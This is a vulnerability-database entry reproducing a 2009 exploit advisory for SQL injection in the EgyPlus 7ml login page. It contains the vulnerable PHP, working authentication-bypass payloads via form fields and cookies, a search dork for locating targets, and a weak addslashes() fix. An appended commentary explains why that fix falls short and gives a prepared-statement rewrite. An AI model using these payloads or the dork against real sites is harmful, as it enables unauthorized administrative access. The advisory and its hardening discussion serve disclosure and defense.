EgyPlus 7ammel "cpanel/login.php" SQL Injection Vulnerability

Vulnerability ID: 1117901    Vulnerability type: SQL injection
Published: 2009-06-03    Updated: 2009-06-25
CVE ID: CVE-2009-2167    CNNVD ID: CNNVD-200906-362
Platform: PHP    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/8865
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-362
|Details
Multiple SQL injection vulnerabilities exist in cpanel/login.php of EgyPlus 7ammel (aka 7ml) 1.0.1 and earlier. When magic_quotes_gpc is disabled, a remote attacker can execute arbitrary SQL commands via the (1) username or (2) password parameter.
|Exploit
||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
          (  :  /    (_)    /           (      .


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait, PEACE...

=Vuln:		EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)
=INFO:		http://egyplus.org/article-2.htm
=Download:  	http://traidnt.net/vb/attachment.php?attachmentid=252224&d=1211197439
=DORK:  	"Powered By EgyPlus"

                             _-=/:Conditions:\=-_
---------------------------------------------------------------------------------
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off
--------------------------------------=_=---------------------------------------

                            _-=/:Vulnerable_Code:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::--

if($_COOKIE['username']){
$username = $_COOKIE['username']; <---- Not filtered
$password = $_COOKIE['password']; <---- Not filtered
}else{
$username = $_POST['username'];   <---- Not filtered
$password = $_POST['password'];   <---- Not filtered
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)  <---- Checks if MySQL statement is true then continues, FAIL...
{
---------------------------------------=_=--------------------------------------

                     _-=/:Proof-OF-Concept-or-Whatever:\=-_
---------------------------------------------------------------------------------
We have TWO ways to do this:

Login with these:

username: qabandi' or '1'='1
password: qabandi' or '1'='1


or we set cookies (longer version)
javascript:document.cookie = "username=qabandi' or '1'='1"
javascript:document.cookie = "password=qabandi' or '1'='1"
---------------------------------------=_=--------------------------------------

                            _-=/:SOLUTION:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::-- <== Change the code as following;

if($_COOKIE['username']){
$username = addslashes($_COOKIE['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_COOKIE['password']); <---- Filter with ADDSLASHES()
}else{
$username = addslashes($_POST['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_POST['password']); <---- Filter with ADDSLASHES()
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)
{
---------------------------------------=_=--------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-
-=-=-=-==Bdon-=-za3al=-=-shabab-=-=el-thaghra-=-mafe=--=Mnha=--=-faydeh-==-==-=-
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-
-==-=-=-=-==-=-==-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=---=-==-=-==-=-=-=-=-=-=--
=-=-=-=-==-=-=-=-=-=-No----More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-
Salam to All Muslim Hackers.

# milw0rm.com [2009-06-03]
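The advisory's proposed fix wraps each input in addslashes(). That is not a dependable defense: it is charset-unaware (a multibyte sequence can absorb the escaping backslash), it does nothing for values that land in a numeric context, and it reproduces exactly the global-escaping approach of magic_quotes_gpc, which PHP removed in 5.4. The durable fix for the pattern shown in cpanel/login.php is to never build the query from strings at all. The block below is an added example written for this page; it is not EgyPlus/7ml code and not part of the advisory. It rewrites the same admin lookup with a PDO prepared statement and a hashed password check, using an in-memory SQLite table with one constructed admin row so it runs offline (requires the pdo_sqlite extension). The table layout and the function names buildDemoDb, adminLogin and demo are assumptions made for the example.

```php
<?php
// Added example, not EgyPlus/7ml code: the advisory's admin lookup rebuilt so
// that user input is bound as a parameter and never interpolated into SQL.

// Builds a throwaway SQLite database whose "admin" table mirrors the two
// columns the original query reads (name, pass). Constructed for the demo.
function buildDemoDb(): PDO {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec("CREATE TABLE admin (name TEXT NOT NULL, pass TEXT NOT NULL)");

    // Store a password hash instead of the plaintext the original compares
    // directly in SQL; the insert itself is also parameterized.
    $stmt = $pdo->prepare("INSERT INTO admin (name, pass) VALUES (:name, :pass)");
    $stmt->execute([
        ':name' => 'admin',
        ':pass' => password_hash('correct horse', PASSWORD_DEFAULT),
    ]);
    return $pdo;
}

// Replacement for the vulnerable block in cpanel/login.php. The username is
// bound with :name, so a quote character inside it is plain data and cannot
// terminate the string literal. The password never reaches the database at
// all: it is checked against the stored hash in PHP.
function adminLogin(PDO $pdo, string $username, string $password): bool {
    $stmt = $pdo->prepare("SELECT pass FROM admin WHERE name = :name");
    $stmt->execute([':name' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;              // no such account
    }
    return password_verify($password, $row['pass']);
}

// Exercises the hardened login with valid credentials, a wrong password, and
// the quote-bearing string from the advisory, which now simply matches no row.
function demo(): array {
    $pdo = buildDemoDb();
    $payload = "qabandi' or '1'='1";   // the advisory's input, treated as data
    return [
        'valid login'       => adminLogin($pdo, 'admin', 'correct horse'),
        'wrong password'    => adminLogin($pdo, 'admin', 'guess'),
        'injection payload' => adminLogin($pdo, $payload, $payload),
    ];
}

var_dump(demo());
```

Two design points carry the weight here. First, the original code's `num_rows == 1` test treats "the WHERE clause matched something" as proof of identity; binding the name and verifying the hash in PHP means the only way to get true is to know the password for that exact account. Second, reading credentials from a cookie is unchanged in the advisory's fix and remains a weak design: once a session is established it should be represented by an opaque server-side session id, not by the username and password echoed back on every request.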
|References

Source: XF
Name: egyplus-login-sql-injection(50935)
Link: http://xforce.iss.net/xforce/xfdb/50935
Source: VUPEN
Name: ADV-2009-1491
Link: http://www.vupen.com/english/advisories/2009/1491
Source: MILW0RM
Name: 8865
Link: http://www.milw0rm.com/exploits/8865